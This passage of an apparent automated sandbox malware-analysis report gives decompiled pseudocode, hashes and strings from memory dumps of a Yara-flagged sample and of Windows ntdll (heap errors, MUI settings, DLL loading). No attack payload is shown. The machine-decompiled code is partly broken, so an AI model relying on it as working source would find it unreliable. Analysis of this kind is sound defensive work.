                                                				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}






                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E0041A6A2() {
                                                				int _v0;
                                                				intOrPtr _v4;
                                                				signed int _v117;
                                                				char _t7;
                                                				signed int _t13;
                                                				void* _t15;
                                                				void* _t16;
                                                
                                                				_t16 = _t15 + 1;
                                                				 *[fs:esi-0x5] = _t7;
                                                				_push(ds);
                                                				asm("clc");
                                                				_v117 = _v117 | _t13;
                                                				_t8 = _v4;
                                                				_push(0x17a00ebe);
                                                				E0041AF60(_t16, _v4, _v4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
                                                				ExitProcess(_v0);
                                                			}











                                                APIs
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: f78c6555b27de646f7765b8dfe6d6f017e464a20bfd60f59cc18c3760db5650b
                                                • Instruction ID: 4d55b754e0fc405db531279852011d8989346df78adfeb32bb496a1978c2f1cc
                                                • Opcode Fuzzy Hash: f78c6555b27de646f7765b8dfe6d6f017e464a20bfd60f59cc18c3760db5650b
                                                • Instruction Fuzzy Hash: BDE0DF71901304BBC320CB68CC85FC77BA8DF49750F0584A9B858A7242C1319A00CAA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A6B0(intOrPtr _a4, int _a8) {
                                                				void* _t10;
                                                
                                                				_t5 = _a4;
                                                				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                				ExitProcess(_a8);
                                                			}





                                                APIs
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a1be8856c75d935d263c4bf761cc9390bb84d502e03d9cccd4f108e7696b75bb
                                                • Instruction ID: 2ff74182270983fd707daea04a197ab623bdbf55a6eb914cb22d18bd0074d0b8
                                                • Opcode Fuzzy Hash: a1be8856c75d935d263c4bf761cc9390bb84d502e03d9cccd4f108e7696b75bb
                                                • Instruction Fuzzy Hash: 0AB09B719014E5C9E615D7A44E08717794477D1745F56C061D1020651B4778C095F5B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Strings
                                                • *** enter .exr %p for the exception record, xrefs: 0169B4F1
                                                • The instruction at %p referenced memory at %p., xrefs: 0169B432
                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0169B314
                                                • The resource is owned shared by %d threads, xrefs: 0169B37E
                                                • *** An Access Violation occurred in %ws:%s, xrefs: 0169B48F
                                                • a NULL pointer, xrefs: 0169B4E0
                                                • *** then kb to get the faulting stack, xrefs: 0169B51C
                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0169B53F
                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 0169B352
                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0169B2F3
                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0169B323
                                                • Go determine why that thread has not released the critical section., xrefs: 0169B3C5
                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0169B38F
                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0169B484
                                                • This failed because of error %Ix., xrefs: 0169B446
                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0169B47D
                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0169B2DC
                                                • *** enter .cxr %p for the context, xrefs: 0169B50D
                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0169B476
                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0169B305
                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0169B3D6
                                                • <unknown>, xrefs: 0169B27E, 0169B2D1, 0169B350, 0169B399, 0169B417, 0169B48E
                                                • an invalid address, %p, xrefs: 0169B4CF
                                                • read from, xrefs: 0169B4AD, 0169B4B2
                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0169B39B
                                                • The resource is owned exclusively by thread %p, xrefs: 0169B374
                                                • *** Inpage error in %ws:%s, xrefs: 0169B418
                                                • The critical section is owned by thread %p., xrefs: 0169B3B9
                                                • The instruction at %p tried to %s , xrefs: 0169B4B6
                                                • write to, xrefs: 0169B4A6
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • API String ID: 0-108210295
                                                • Opcode ID: d847b03339f8f999a21cda7f107fcfbab47789531343bb38507d6ca22759747c
                                                • Instruction ID: b824e12dfe97d30ce7151076c9fd2968adae06d326f85a81c41fd9c5b2859d05
                                                • Opcode Fuzzy Hash: d847b03339f8f999a21cda7f107fcfbab47789531343bb38507d6ca22759747c
                                                • Instruction Fuzzy Hash: B7810075A40200FFDF31AA4AEC86E7B7B3AEF56A52F40408CF5052F252D3618442DBB6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 44%
                                                			E016A1C06() {
                                                				signed int _t27;
                                                				char* _t104;
                                                				char* _t105;
                                                				intOrPtr _t113;
                                                				intOrPtr _t115;
                                                				intOrPtr _t117;
                                                				intOrPtr _t119;
                                                				intOrPtr _t120;
                                                
                                                				_t105 = 0x15c48a4;
                                                				_t104 = "HEAP: ";
                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                					_push(_t104);
                                                					E015EB150();
                                                				} else {
                                                					E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                				}
                                                				_push( *0x16d589c);
                                                				E015EB150("Heap error detected at %p (heap handle %p)\n",  *0x16d58a0);
                                                				_t27 =  *0x16d5898; // 0x0
                                                				if(_t27 <= 0xf) {
                                                					switch( *((intOrPtr*)(_t27 * 4 +  &M016A1E96))) {
                                                						case 0:
                                                							_t105 = "heap_failure_internal";
                                                							goto L21;
                                                						case 1:
                                                							goto L21;
                                                						case 2:
                                                							goto L21;
                                                						case 3:
                                                							goto L21;
                                                						case 4:
                                                							goto L21;
                                                						case 5:
                                                							goto L21;
                                                						case 6:
                                                							goto L21;
                                                						case 7:
                                                							goto L21;
                                                						case 8:
                                                							goto L21;
                                                						case 9:
                                                							goto L21;
                                                						case 0xa:
                                                							goto L21;
                                                						case 0xb:
                                                							goto L21;
                                                						case 0xc:
                                                							goto L21;
                                                						case 0xd:
                                                							goto L21;
                                                						case 0xe:
                                                							goto L21;
                                                						case 0xf:
                                                							goto L21;
                                                					}
                                                				}
                                                				L21:
                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                					_push(_t104);
                                                					E015EB150();
                                                				} else {
                                                					E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                				}
                                                				_push(_t105);
                                                				E015EB150("Error code: %d - %s\n",  *0x16d5898);
                                                				_t113 =  *0x16d58a4; // 0x0
                                                				if(_t113 != 0) {
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push(_t104);
                                                						E015EB150();
                                                					} else {
                                                						E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					E015EB150("Parameter1: %p\n",  *0x16d58a4);
                                                				}
                                                				_t115 =  *0x16d58a8; // 0x0
                                                				if(_t115 != 0) {
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push(_t104);
                                                						E015EB150();
                                                					} else {
                                                						E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					E015EB150("Parameter2: %p\n",  *0x16d58a8);
                                                				}
                                                				_t117 =  *0x16d58ac; // 0x0
                                                				if(_t117 != 0) {
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push(_t104);
                                                						E015EB150();
                                                					} else {
                                                						E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					E015EB150("Parameter3: %p\n",  *0x16d58ac);
                                                				}
                                                				_t119 =  *0x16d58b0; // 0x0
                                                				if(_t119 != 0) {
                                                					L41:
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push(_t104);
                                                						E015EB150();
                                                					} else {
                                                						E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					_push( *0x16d58b4);
                                                					E015EB150("Last known valid blocks: before - %p, after - %p\n",  *0x16d58b0);
                                                				} else {
                                                					_t120 =  *0x16d58b4; // 0x0
                                                					if(_t120 != 0) {
                                                						goto L41;
                                                					}
                                                				}
                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                					_push(_t104);
                                                					E015EB150();
                                                				} else {
                                                					E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                				}
                                                				return E015EB150("Stack trace available at %p\n", 0x16d58c0);
                                                			}












                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                • API String ID: 0-2897834094
                                                • Opcode ID: 311560b79a0458c02236817fdfc24c3f1de33de31e3b88df03393150617911d7
                                                • Instruction ID: a7c268a139332c6c74141c1f5d7c82523ead8ce7f5eb5bb62d17efdd024586e3
                                                • Opcode Fuzzy Hash: 311560b79a0458c02236817fdfc24c3f1de33de31e3b88df03393150617911d7
                                                • Instruction Fuzzy Hash: C761EF37952153DFC329AB8DDC8AE2473E4FB05972F8A802EF50A5F700D6289D418F0A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E015F3D34(signed int* __ecx) {
                                                				signed int* _v8;
                                                				char _v12;
                                                				signed int* _v16;
                                                				signed int* _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				char _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int* _v48;
                                                				signed int* _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				char _v68;
                                                				signed int _t140;
                                                				signed int _t161;
                                                				signed int* _t236;
                                                				signed int* _t242;
                                                				signed int* _t243;
                                                				signed int* _t244;
                                                				signed int* _t245;
                                                				signed int _t255;
                                                				void* _t257;
                                                				signed int _t260;
                                                				void* _t262;
                                                				signed int _t264;
                                                				void* _t267;
                                                				signed int _t275;
                                                				signed int* _t276;
                                                				short* _t277;
                                                				signed int* _t278;
                                                				signed int* _t279;
                                                				signed int* _t280;
                                                				short* _t281;
                                                				signed int* _t282;
                                                				short* _t283;
                                                				signed int* _t284;
                                                				void* _t285;
                                                
                                                				_v60 = _v60 | 0xffffffff;
                                                				_t280 = 0;
                                                				_t242 = __ecx;
                                                				_v52 = __ecx;
                                                				_v8 = 0;
                                                				_v20 = 0;
                                                				_v40 = 0;
                                                				_v28 = 0;
                                                				_v32 = 0;
                                                				_v44 = 0;
                                                				_v56 = 0;
                                                				_t275 = 0;
                                                				_v16 = 0;
                                                				if(__ecx == 0) {
                                                					_t280 = 0xc000000d;
                                                					_t140 = 0;
                                                					L50:
                                                					 *_t242 =  *_t242 | 0x00000800;
                                                					_t242[0x13] = _t140;
                                                					_t242[0x16] = _v40;
                                                					_t242[0x18] = _v28;
                                                					_t242[0x14] = _v32;
                                                					_t242[0x17] = _t275;
                                                					_t242[0x15] = _v44;
                                                					_t242[0x11] = _v56;
                                                					_t242[0x12] = _v60;
                                                					return _t280;
                                                				}
                                                				if(E015F1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                					_v56 = 1;
                                                					if(_v8 != 0) {
                                                						L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                					}
                                                					_v8 = _t280;
                                                				}
                                                				if(E015F1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                					_v60 =  *_v8;
                                                					L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                					_v8 = _t280;
                                                				}
                                                				if(E015F1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                					L16:
                                                					if(E015F1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                						L28:
                                                						if(E015F1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                							L46:
                                                							_t275 = _v16;
                                                							L47:
                                                							_t161 = 0;
                                                							L48:
                                                							if(_v8 != 0) {
                                                								L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                							}
                                                							_t140 = _v20;
                                                							if(_t140 != 0) {
                                                								if(_t275 != 0) {
                                                									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                									_t275 = 0;
                                                									_v28 = 0;
                                                									_t140 = _v20;
                                                								}
                                                							}
                                                							goto L50;
                                                						}
                                                						_t167 = _v12;
                                                						_t255 = _v12 + 4;
                                                						_v44 = _t255;
                                                						if(_t255 == 0) {
                                                							_t276 = _t280;
                                                							_v32 = _t280;
                                                						} else {
                                                							_t276 = L01604620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                							_t167 = _v12;
                                                							_v32 = _t276;
                                                						}
                                                						if(_t276 == 0) {
                                                							_v44 = _t280;
                                                							_t280 = 0xc0000017;
                                                							goto L46;
                                                						} else {
                                                							E0162F3E0(_t276, _v8, _t167);
                                                							_v48 = _t276;
                                                							_t277 = E01631370(_t276, 0x15c4e90);
                                                							_pop(_t257);
                                                							if(_t277 == 0) {
                                                								L38:
                                                								_t170 = _v48;
                                                								if( *_v48 != 0) {
                                                									E0162BB40(0,  &_v68, _t170);
                                                									if(L015F43C0( &_v68,  &_v24) != 0) {
                                                										_t280 =  &(_t280[0]);
                                                									}
                                                								}
                                                								if(_t280 == 0) {
                                                									_t280 = 0;
                                                									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                									_v44 = 0;
                                                									_v32 = 0;
                                                								} else {
                                                									_t280 = 0;
                                                								}
                                                								_t174 = _v8;
                                                								if(_v8 != 0) {
                                                									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                								}
                                                								_v8 = _t280;
                                                								goto L46;
                                                							}
                                                							_t243 = _v48;
                                                							do {
                                                								 *_t277 = 0;
                                                								_t278 = _t277 + 2;
                                                								E0162BB40(_t257,  &_v68, _t243);
                                                								if(L015F43C0( &_v68,  &_v24) != 0) {
                                                									_t280 =  &(_t280[0]);
                                                								}
                                                								_t243 = _t278;
                                                								_t277 = E01631370(_t278, 0x15c4e90);
                                                								_pop(_t257);
                                                							} while (_t277 != 0);
                                                							_v48 = _t243;
                                                							_t242 = _v52;
                                                							goto L38;
                                                						}
                                                					}
                                                					_t191 = _v12;
                                                					_t260 = _v12 + 4;
                                                					_v28 = _t260;
                                                					if(_t260 == 0) {
                                                						_t275 = _t280;
                                                						_v16 = _t280;
                                                					} else {
                                                						_t275 = L01604620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                						_t191 = _v12;
                                                						_v16 = _t275;
                                                					}
                                                					if(_t275 == 0) {
                                                						_v28 = _t280;
                                                						_t280 = 0xc0000017;
                                                						goto L47;
                                                					} else {
                                                						E0162F3E0(_t275, _v8, _t191);
                                                						_t285 = _t285 + 0xc;
                                                						_v48 = _t275;
                                                						_t279 = _t280;
                                                						_t281 = E01631370(_v16, 0x15c4e90);
                                                						_pop(_t262);
                                                						if(_t281 != 0) {
                                                							_t244 = _v48;
                                                							do {
                                                								 *_t281 = 0;
                                                								_t282 = _t281 + 2;
                                                								E0162BB40(_t262,  &_v68, _t244);
                                                								if(L015F43C0( &_v68,  &_v24) != 0) {
                                                									_t279 =  &(_t279[0]);
                                                								}
                                                								_t244 = _t282;
                                                								_t281 = E01631370(_t282, 0x15c4e90);
                                                								_pop(_t262);
                                                							} while (_t281 != 0);
                                                							_v48 = _t244;
                                                							_t242 = _v52;
                                                						}
                                                						_t201 = _v48;
                                                						_t280 = 0;
                                                						if( *_v48 != 0) {
                                                							E0162BB40(_t262,  &_v68, _t201);
                                                							if(L015F43C0( &_v68,  &_v24) != 0) {
                                                								_t279 =  &(_t279[0]);
                                                							}
                                                						}
                                                						if(_t279 == 0) {
                                                							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                							_v28 = _t280;
                                                							_v16 = _t280;
                                                						}
                                                						_t202 = _v8;
                                                						if(_v8 != 0) {
                                                							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                						}
                                                						_v8 = _t280;
                                                						goto L28;
                                                					}
                                                				}
                                                				_t214 = _v12;
                                                				_t264 = _v12 + 4;
                                                				_v40 = _t264;
                                                				if(_t264 == 0) {
                                                					_v20 = _t280;
                                                				} else {
                                                					_t236 = L01604620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                					_t280 = _t236;
                                                					_v20 = _t236;
                                                					_t214 = _v12;
                                                				}
                                                				if(_t280 == 0) {
                                                					_t161 = 0;
                                                					_t280 = 0xc0000017;
                                                					_v40 = 0;
                                                					goto L48;
                                                				} else {
                                                					E0162F3E0(_t280, _v8, _t214);
                                                					_t285 = _t285 + 0xc;
                                                					_v48 = _t280;
                                                					_t283 = E01631370(_t280, 0x15c4e90);
                                                					_pop(_t267);
                                                					if(_t283 != 0) {
                                                						_t245 = _v48;
                                                						do {
                                                							 *_t283 = 0;
                                                							_t284 = _t283 + 2;
                                                							E0162BB40(_t267,  &_v68, _t245);
                                                							if(L015F43C0( &_v68,  &_v24) != 0) {
                                                								_t275 = _t275 + 1;
                                                							}
                                                							_t245 = _t284;
                                                							_t283 = E01631370(_t284, 0x15c4e90);
                                                							_pop(_t267);
                                                						} while (_t283 != 0);
                                                						_v48 = _t245;
                                                						_t242 = _v52;
                                                					}
                                                					_t224 = _v48;
                                                					_t280 = 0;
                                                					if( *_v48 != 0) {
                                                						E0162BB40(_t267,  &_v68, _t224);
                                                						if(L015F43C0( &_v68,  &_v24) != 0) {
                                                							_t275 = _t275 + 1;
                                                						}
                                                					}
                                                					if(_t275 == 0) {
                                                						L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                						_v40 = _t280;
                                                						_v20 = _t280;
                                                					}
                                                					_t225 = _v8;
                                                					if(_v8 != 0) {
                                                						L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                					}
                                                					_v8 = _t280;
                                                					goto L16;
                                                				}
                                                			}


                                                Strings
                                                • Kernel-MUI-Number-Allowed, xrefs: 015F3D8C
                                                • Kernel-MUI-Language-Disallowed, xrefs: 015F3E97
                                                • Kernel-MUI-Language-Allowed, xrefs: 015F3DC0
                                                • WindowsExcludedProcs, xrefs: 015F3D6F
                                                • Kernel-MUI-Language-SKU, xrefs: 015F3F70
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 0-258546922
                                                • Opcode ID: a568be04acc728e0293df566c19facfd01b8bb1a7b896ab39442b95982e24e55
                                                • Instruction ID: bf28d5d59ce87b49835d2e8dcdb13413ebe0184c05ba340af3a0b614fbacbcd6
                                                • Opcode Fuzzy Hash: a568be04acc728e0293df566c19facfd01b8bb1a7b896ab39442b95982e24e55
                                                • Instruction Fuzzy Hash: D7F13A72D00619EFDB16DFD8C980AEFBBB9FF58650F14406AE605AB250D7349E01CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 44%
                                                			E01618E00(void* __ecx) {
                                                				signed int _v8;
                                                				char _v12;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t32;
                                                				intOrPtr _t35;
                                                				intOrPtr _t43;
                                                				void* _t46;
                                                				intOrPtr _t47;
                                                				void* _t48;
                                                				signed int _t49;
                                                				void* _t50;
                                                				intOrPtr* _t51;
                                                				signed int _t52;
                                                				void* _t53;
                                                				intOrPtr _t55;
                                                
                                                				_v8 =  *0x16dd360 ^ _t52;
                                                				_t49 = 0;
                                                				_t48 = __ecx;
                                                				_t55 =  *0x16d8464; // 0x74e10110
                                                				if(_t55 == 0) {
                                                					L9:
                                                					if( !_t49 >= 0) {
                                                						if(( *0x16d5780 & 0x00000003) != 0) {
                                                							E01665510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                						}
                                                						if(( *0x16d5780 & 0x00000010) != 0) {
                                                							asm("int3");
                                                						}
                                                					}
                                                					return E0162B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                				}
                                                				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                				_t43 =  *0x16d7984; // 0x1182b70
                                                				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                					if(_t48 == _t43) {
                                                						_t50 = 0x5c;
                                                						if( *_t32 == _t50) {
                                                							_t46 = 0x3f;
                                                							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                								_t32 = _t32 + 8;
                                                							}
                                                						}
                                                					}
                                                					_t51 =  *0x16d8464; // 0x74e10110
                                                					 *0x16db1e0(_t47, _t32,  &_v12);
                                                					_t49 =  *_t51();
                                                					if(_t49 >= 0) {
                                                						L8:
                                                						_t35 = _v12;
                                                						if(_t35 != 0) {
                                                							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                								E01619B10( *((intOrPtr*)(_t48 + 0x48)));
                                                								_t35 = _v12;
                                                							}
                                                							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                						}
                                                						goto L9;
                                                					}
                                                					if(_t49 != 0xc000008a) {
                                                						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                							if(_t49 != 0xc00000bb) {
                                                								goto L8;
                                                							}
                                                						}
                                                					}
                                                					if(( *0x16d5780 & 0x00000005) != 0) {
                                                						_push(_t49);
                                                						E01665510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                						_t53 = _t53 + 0x1c;
                                                					}
                                                					_t49 = 0;
                                                					goto L8;
                                                				} else {
                                                					goto L9;
                                                				}
                                                			}



                                                Strings
                                                • LdrpFindDllActivationContext, xrefs: 01659331, 0165935D
                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 01659357
                                                • minkernel\ntdll\ldrsnap.c, xrefs: 0165933B, 01659367
                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0165932A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 0-3779518884
                                                • Opcode ID: c05b3a888d35bb3672f05e693b1f2eb40568804a865dc34b6503b0eaf9a24d22
                                                • Instruction ID: 55a2f0cf2ea3c77ecb2744829906c95fff7720e1f05cfe5a950cb87770d87c8f
                                                • Opcode Fuzzy Hash: c05b3a888d35bb3672f05e693b1f2eb40568804a865dc34b6503b0eaf9a24d22
                                                • Instruction Fuzzy Hash: A2411832E00315DFEF36AA5C8C49A7ABABDBB41748F0E416DE9049765AE7705D8087C1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E015F8794(void* __ecx) {
                                                				signed int _v0;
                                                				char _v8;
                                                				signed int _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				intOrPtr _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v40;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				intOrPtr* _t77;
                                                				signed int _t80;
                                                				signed char _t81;
                                                				signed int _t87;
                                                				signed int _t91;
                                                				void* _t92;
                                                				void* _t94;
                                                				signed int _t95;
                                                				signed int _t103;
                                                				signed int _t105;
                                                				signed int _t110;
                                                				signed int _t118;
                                                				intOrPtr* _t121;
                                                				intOrPtr _t122;
                                                				signed int _t125;
                                                				signed int _t129;
                                                				signed int _t131;
                                                				signed int _t134;
                                                				signed int _t136;
                                                				signed int _t143;
                                                				signed int* _t147;
                                                				signed int _t151;
                                                				void* _t153;
                                                				signed int* _t157;
                                                				signed int _t159;
                                                				signed int _t161;
                                                				signed int _t166;
                                                				signed int _t168;
                                                
                                                				_push(__ecx);
                                                				_t153 = __ecx;
                                                				_t159 = 0;
                                                				_t121 = __ecx + 0x3c;
                                                				if( *_t121 == 0) {
                                                					L2:
                                                					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                							L6:
                                                							if(E015F934A() != 0) {
